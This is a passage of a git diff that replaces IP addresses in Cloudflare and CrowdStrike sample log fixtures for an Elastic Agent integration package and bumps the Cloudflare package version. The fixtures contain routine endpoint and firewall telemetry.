"Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.7052, - "lat": 45.461 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 30629, + "number": 29518, "organization": { - "name": "Lewis \u0026 Clark College" + "name": "Bredband2 AB" } }, - "address": "149.175.108.201", + "address": "89.160.20.156", "port": 61593, "bytes": 2520, - "ip": "149.175.108.201" + "ip": "89.160.20.156" }, "tls": { "cipher": "AEAD-AES128-GCM-SHA256", @@ -540,8 +548,8 @@ }, "event": { "duration": 8000000, - "ingested": "2021-08-10T07:34:12.277506500Z", - "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"149.175.108.201\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2520,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/s/eqldemo/security/account\",\"ClientRequestProtocol\":\"HTTP/2\",\"ClientRequestReferer\":\"\",\"ClientRequestURI\":\"/s/eqldemo/security/account\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"AEAD-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.3\",\"ClientSrcPort\":61593,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"AMS\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625754264684000000,\"EdgePathingOp\":\"ban\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"183.53.30.34\",\"EdgeResponseBytes\":2066,\"EdgeResponseCompressionRatio\":2.45,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":1625754264676000000,\"FirewallMatchesActions\":[\"block\"],\"FirewallMatchesRuleIDs\":[\"391eb601201e4f2a81038910f2b63f6d\"],\"FirewallMatchesSources\":[\"firewallRules\"],\"OriginIP\":\"7.8.9.1\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"66b9f9da396e4c01\",\"SecurityLevel\":\"unk\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", + "ingested": "2021-12-09T13:36:03.427515700Z", + "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2520,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/s/eqldemo/security/account\",\"ClientRequestProtocol\":\"HTTP/2\",\"ClientRequestReferer\":\"\",\"ClientRequestURI\":\"/s/eqldemo/security/account\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"AEAD-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.3\",\"ClientSrcPort\":61593,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"AMS\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625754264684000000,\"EdgePathingOp\":\"ban\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"183.53.30.34\",\"EdgeResponseBytes\":2066,\"EdgeResponseCompressionRatio\":2.45,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":1625754264676000000,\"FirewallMatchesActions\":[\"block\"],\"FirewallMatchesRuleIDs\":[\"391eb601201e4f2a81038910f2b63f6d\"],\"FirewallMatchesSources\":[\"firewallRules\"],\"OriginIP\":\"89.160.20.156\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"66b9f9da396e4c01\",\"SecurityLevel\":\"unk\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:24:24.676Z", "end": "2021-07-08T14:24:24.684Z", diff --git a/packages/cloudflare/manifest.yml b/packages/cloudflare/manifest.yml index 47e12f54c0f..0982fefd357 100644 --- a/packages/cloudflare/manifest.yml +++ b/packages/cloudflare/manifest.yml @@ -1,6 +1,6 @@ name: cloudflare title: Cloudflare -version: 1.1.0 +version: 1.1.1 release: ga description: Collect and parse logs from Cloudflare API with Elastic Agent. type: integration diff --git a/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log b/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log index 6a811c1efb2..87070601c11 100644 --- a/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log +++ b/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log @@ -71,7 +71,7 @@ }, "event": { "UserId": "first.last@company.com", - "UserIp": "165.225.220.184", + "UserIp": "67.43.156.15", "OperationName": "saml2Assert", "ServiceName": "Crowdstrike Authentication", "Success": true, diff --git a/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log b/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log index d2fe20312a9..0d410547d63 100644 --- a/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log +++ b/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log @@ -1,124 +1,124 @@ -{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"208.210.242.193","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"208.254.115.95","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0","RemoteAddressIP6":"ff88:1:1:ffff:1014:ce99:9b06:ab12","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"208.126.205.223","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"208.130.207.129","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"208.49.81.196","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"208.24.129.49","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"208.230.0.2","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"208.30.0.2","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"208.215.150.206","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"208.187.110.246","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"208.194.125.248","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"208.24.230.3","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"} -{"LocalAddressIP4":"208.230.137.65","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"208.254.169.254","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"208.231.69.37","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"208.203.151.21","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"208.169.10.84","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"208.231.69.37","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"208.187.110.246","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"208.223.60.11","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"208.208.21.205","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"208.198.160.35","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"} -{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"208.180.129.90","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"} -{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"ff88:1:1:ffff:440a:57ff:fe3a:8abc","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"208.203.151.21","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"208.130.71.241","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"} -{"LocalAddressIP4":"208.210.109.249","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"208.233.129.250","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"208.216.236.59","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"208.93.153.49","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMajor":"1","VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} -{"LocalAddressIP4":"208.30.117.28","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"208.233.54.217","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"ff88:1:1:ffff:442a:7bff:fe75:9ed","ConfigStateHash":"3967242894","aip":"208.165.30.176","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"OutOctets":"0","CreationTimeStamp":"","aip":"208.176.144.39","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:c027:b0ff:fe27:830f","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"208.98.120.25","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 